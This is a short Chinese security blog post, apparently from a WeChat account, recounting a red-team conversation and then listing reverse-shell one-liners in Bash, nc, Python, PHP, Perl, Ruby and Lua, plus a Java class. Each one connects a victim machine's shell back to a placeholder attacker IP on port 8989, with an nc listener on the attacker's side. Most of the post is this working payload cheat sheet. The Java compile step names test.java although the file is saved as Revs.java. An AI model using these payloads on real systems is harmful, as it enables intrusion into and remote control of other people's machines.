-
前言
近期一直在聊的师傅,但是我记得师傅是bt,怎么搞了个rt的活了,但是今早师傅在群里发了一句,我们好像已经不用打了,堡垒机都被拿下了!!我想,师傅这是想早点下班吧,不仅拿bt的钱钱,还拿了rt的钱钱,师傅牛逼!!师傅的情况是这样子的,可以进行命令执行,但是不能搞反弹shell,与代理毫无关系,聊的时候,思路就不对了。给师傅带跑了>.<
-
Bash反弹shell
攻击机:nc -lvp 8989
受害机:bash -i >& /dev/tcp/攻击者ip/8989 0>&1
-
Nc反弹shell
受害机:nc -e /bin/bash 攻击者ip 8989
攻击机:nc -lvp 8989
-
Python反弹shell
受害机:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击者ip",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
攻击机:nc -lvp 8989
-
Php反弹shell
攻击机:nc -lvp 8989
受害机:php73 -r '$sock=fsockopen("攻击者ip",8989);exec("/bin/sh -i <&3 >&3 2>&3");'
-
Perl反弹shell
受害者:perl -e 'use Socket;$i="攻击者ip";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
攻击者:nc -lvp 8989
-
Ruby反弹shell
受害者:ruby -rsocket -e'f=TCPSocket.open("攻击者ip",8989).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
攻击者:nc -lvp 8989
-
Lua反弹shell
受害者:lua -e "require('socket');require('os');t=socket.tcp();t:connect('攻击者ip','8989');os.execute('/bin/sh -i <&3 >&3 2>&3');"
攻击者:nc -lvp 8989
-
java反弹
public class Revs {
/**
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/攻击者ip/8989;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}
保存为Revs.java文件,编译执行
javac test.java
java test
攻击者:nc -lvp 8989
-
微信群介绍
本公众号只用来记录一些自己在安全道路上所学所想所看,更多的是技术的互相交流,工具及部分不方便内容均放在知识星球中,知识星球加入渠道,加入微信群,互相吹水,互相学习,互相进步!!
-
总结
已经很久没有打过rt或者是做过大型靶场了,对于思路上已经是淡了很多,好在有各大师傅之间的互相学习交流,共同进步,让我复习了一遍反弹Shell的姿势,还是得向大师傅说声抱歉,自己还是有好多需要进行总结、进步。
原文始发于微信公众号(Undoubted Security):一场误导引起的反弹Shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论